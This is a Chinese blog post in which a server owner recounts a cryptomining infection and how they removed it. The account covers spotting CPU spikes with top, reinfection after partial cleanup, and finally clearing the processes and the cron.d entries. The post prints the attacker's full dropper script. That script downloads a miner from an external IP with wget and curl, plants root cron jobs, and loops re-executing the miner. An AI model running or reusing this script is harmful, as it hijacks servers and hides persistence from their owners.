记录一次服务器被挖矿程序攻击的过程

最新推荐文章于 2024-08-15 08:33:03 发布
最新推荐文章于 2024-08-15 08:33:03 发布
阅读量40 收藏
点赞数
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38917673/article/details/135861579
版权

问题的起源就是上图的脚本指令。

打开这个网址https://45.130.22.219/wgcloud.js 显示出来这个js文件其实是一个恶意脚本文件,内容如下:

#!/bin/bash

url='https://45.130.22.219/wgcloud'

name1=`date +%s%N`

wget --no-check-certificate ${url} -O /etc/$name1

chmod +x /etc/$name1

echo "*/10 * * * * root /etc/$name1" >> /etc/cron.d/$name1

/etc/$name1

name2=`date +%s%N`

curl -k ${url} -o /etc/$name2

chmod +x /etc/$name2

echo "*/10 * * * * root /etc/$name2" >> /etc/cron.d/$name2

/etc/$name2

name3=`date +%s%N`

wget --no-check-certificate ${url} -O /tmp/$name3

chmod +x /tmp/$name3

(crontab -l ; echo "*/10 * * * * /tmp/$name3") | crontab -

/tmp/$name3

name4=`date +%s%N`

curl -k ${url} -o /var/tmp/$name4

chmod +x /var/tmp/$name4

(crontab -l ; echo "*/10 * * * * /var/tmp/$name4") | crontab -

/var/tmp/$name4

while true

do

chmod +x /etc/$name1

/etc/$name1

sleep 60

chmod +x /etc/$name2

/etc/$name2

sleep 60

chmod +x /tmp/$name3

/tmp/$name3

sleep 60

chmod +x /var/tmp/$name4

/var/tmp/$name4

sleep 60

done

这段脚本会不断地创建定时任务和可执行文件。真实的挖矿程序是https://45.130.22.219/wgcloud这个链接下载的。

如何发现被攻击的:

    观察CPU占用情况,阳城服务器一直cpu占用不算特别高。突然发现占比接近100%。通过top命令发现有一个时间戳进程占用特别高的cpu

这个程序很陌生

一波三折的清理过程:

    

    通过ps查看进程的详细信息,发现了可执行文件的位置,当时删除了 tmp目录的脚本文件,以及定时任务中的自动定时任务。观察几十秒没问题,

以为就这样结束了? 错了,第二天还是出现了这个恶意程序。

    当再次看到这个程序,我心里一万个我擦咧,那么神奇? 而且这个程序的运行权限是root账户运行的,我在想是不是root账号被泄露了,赶紧修改了root账号的密码,重新清理这个进程以及对应的脚本文件,以及crontab中的定时任务。此刻我想,应该平息了吧。

    然而事实并非如此,翌日又发现了这个我擦嘞的进程,无奈之下,禁用了ssh链接,转而使用了牧云长亭的服务器运维助手。通过在主机运行脚本,自动向运维助手上报服务器数据。观察了服务器的所有进程之后,发现了上面最早的截图,脚本源头。 然后ps 一下。把这个脚本进程大概4个全部杀掉。清理脚本定时任务,然后cron.d下面的定时任务。这里面的定时任务通过crontab -l并不能查看到。终于。。。。结束了。

stephen_s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一次 Linux 被入侵,服务器变“矿机”全过程.docx
12-25
一次 Linux 被入侵,服务器变“矿机”全过程
服务器日常巡检记录
08-05
服务器日常巡检记录服务器日常巡检记录服务器日常巡检记录
记录一下排除挖矿攻击过程
husongbo的博客
10-10 635
首先,我发现自己的服务器CPU占用率达到了99.9% WTF?虽然我用的是腾讯云的学生版只有1核,但是也不至于干满了啊 于是撸起袖子,先把这个进程杀掉 kill -9 PID ,然后顺着目录找到这个伪装成java的东西 把他干掉,通过crontab -l -u hadoop命令,发现了有定时任务再启动 进入cd /var/spool/cron/目录发现 看一下这个hadoop的...
记录一次服务器挖矿病毒攻击
LeKZzz的博客
03-13 371
本文首发于个人博客网站:http://www.blog.lekshome.top/2024/03/08/ji-lu-yi-ci-fu-wu-qi-wa-kuang-bing-du-gong-ji/指令查找到这个进程的PID后我杀死了这个进程,但是由于一段时间后这个进程会重新出现且每次重启后都会出现这个进程,所以这个进程很显然存在一个定时任务定时启动来防止进程被杀死。的进程占用了所有的CPU资源,Opera是一个浏览器的名称,但是我并没有使用过这个浏览器,而且运行用户是。是 cron 的特殊关键字,等同于。
网络安全应急响应----6、挖矿攻击应急响应
热门推荐
七天
03-21 1万+
文章目录一、挖矿木马简介1、挖矿流程2、挖矿木马的传播方式二、常见的挖矿木马三、挖矿木马应急响应方法3.1、隔离被感染的服务器/主机3.2、确认挖矿进程3.3、系统排查3.3.1、判断挖矿木马挖矿时间3.3.2、了解网络部署环境3.3.3、系统排查3.4、挖矿木马清除四、挖矿木马防御 一、挖矿木马简介 挖矿: 每隔一个时间点,比特币系统会在系统节点上生成一个随机代码,互联网中的所有计算机都可以去寻找此代码,谁找到此代码,就会产生一个区块。而比特币的发行是基于奖励的,每促成一个区块的生成,该节点便获得相应
记录一次挖矿木马攻击的处理过程
天涯哥的博客
11-27 486
记录一次解决centos服务器挖矿木马攻击,导致系统变慢的问题
QT多线程TCP服务器客户端通讯程序
06-05
在QT网络编程中,服务器往往需要和多个客户端保持连接,因此,我在熟悉多线程编程过程中,在TCP服务每接收到一个客户端连接请求,就新建一个线程。客户端也是在新建的线程中维护的。 程序的思路如下: 程序使用了非...
《OPCDA服务器与客户程序开发指南》修订版
06-30
《OPC DA服务器与客户程序开发指南》是一本专注于工业自动化领域的技术图书,主要针对OPC Data Access(OPC DA)技术进行深入讲解。OPC DA是OPC标准的一个核心部分,它为设备和应用程序之间的数据交换提供了一个统一...
美国服务器稳定么?影响服务器稳定性的6个因素
petaexpress的博客
08-09 727
美国服务器的稳定性是相当不错的,这主要得益于其先进的技术、成熟的基础设施以及严格的管理措施。美国拥有众多知名的服务器提供商,这些提供商通常会采用顶级的硬件设施,如英特尔、AMD等知名品牌的处理器,以及三星、金士顿等品牌的内存和硬盘,这些硬件设备在全球范围内具有较高的市场份额和良好的口碑,性能稳定可靠。
linux HBA驱动中scsi_host_template .shost_attrs
Wang20122013的博客
08-13 498
scsi_host_template是一个结构体,用于定义SCSI主机(host adapter)的属性和操作。这个模板用于初始化SCSI主机结构体scsi_host_template,它包含了主机的属性、操作函数等。shost_attrs是scsi_host_template结构体中的一个成员,它是一个属性组,用于定义SCSI主机可以支持的属性。每个属性都会有相应的操作函数,这些函数定义了如何读取或写入属性值。例如,一个属性可能有一个show函数来返回当前值,一个store函数来设置新值。
华为路由的AAA是什么?
huaqianzkh的专栏
08-14 649
华为路由的AAA是Authentication(认证)、‌Authorization(授权)和Accounting(计费)的简称,‌是一种提供认证、‌授权和计费的安全管理机制。‌AAA作为一种网络安全管理机制,‌主要提供以下功能和服务:‌认证:‌验证用户是否可以获得网络访问权,‌确定哪些用户可以访问网络。‌授权:‌授权用户可以使用哪些服务,‌即对用户赋予不同的权限,‌限制用户可以使用的服务。‌计费。
仿Muduo库实现高并发服务器——socket网络通信模块
2201_75324712的博客
08-13 222
服务端:socket(),bind(),listen(),accept().客户端:socket(),connect().下面这段代码,没什么好讲的,就不再讲了。
国内机房与海外机房之间的区别是什么?
wanhengwangluo的博客
08-14 634
服务器的配置上国内的徐州机房一般会受到电信和网通等运营商的影响,配置方面会相对简单一点,但是也会提供多个服务器配置选项,企业能够根据自身的业务需求来选择合适的服务器;海外机房与国内机房的服务器还是有着多方面的区别的,首先在地理位置上海外机房通常是位于中国以外的国家或者是地区,而国内机房则是包含中国各大城市的数据中心,比如徐州的淮海大数据中心。以上就是小编今天分享的内容了,如果还想了解更多内容,或者对服务器感兴趣的话,可以持续关注万恒网络科技,对于不了解和需要进行咨询的地方,也可以私信或评论小编!
Linux:文件管理,目录管理,文件系统,链接类型
燕双嘤
08-13 1208
在Linux操作系统中,文件和目录的管理是日常操作的核心。无论您是系统管理员还是开发者,掌握Linux中文件和目录的管理方法对于高效工作至关重要。本篇博客将深入探讨Linux中的文件管理、目录管理、文件类型及链接类型,帮助您熟练操作和管理您的系统资源。
仿Muduo库实现高并发服务器——事件监控Poller模块
2201_75324712的博客
08-13 189
这个模块是将触发事件的描述符,给到外面,让外面去做对应的处理。
[Linux CMD] 目录与文件相关的命令
最新发布
庐陵居士
08-15 196
代表次层目录代表上一层目录代表前一个工作目录~ 代表目前使用者身份所在的家目录~account 代表account这个使用者的家目录(account是个账号名称)
Java面试八股之什么是MQTT协议
u012151345的博客
08-13 1014
MQTT(Message Queuing Telemetry Transport,消息队列遥测传输)是一种轻量级的“发布/订阅”(Publish/Subscribe)模式的消息传输协议,特别适合于远程和低带宽网络环境,如物联网(IoT)和移动应用。MQTT支持一对多的消息传输,即一个消息发布者可以将消息发送到一个主题,而多个订阅者可以通过订阅这个主题来接收消息。这种模式允许高效的多播通信。MQTT支持会话状态的持久化,这意味着当客户端重新连接时,可以恢复之前的会话状态,继续接收之前订阅的消息。
从springBoot框架服务器上下载文件 自定义一个启动器
weixin_45939821的博客
08-14 268
一:所有启动器配置类的创建使用spring-boot-autoconfigure实现二:spring-boot-configuration-processor找到boot的配置文件实现映射.<parent></parent>
服务器上找到挖矿程序
05-17
如果你怀疑服务器上存在挖矿程序,可以采取以下步骤: 1. 检查进程:使用命令行工具查看当前正在运行的进程,查看是否有任何异常进程或者CPU占用率特别高的进程。 2. 检查网络连接:查看服务器是否与外部的矿池...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值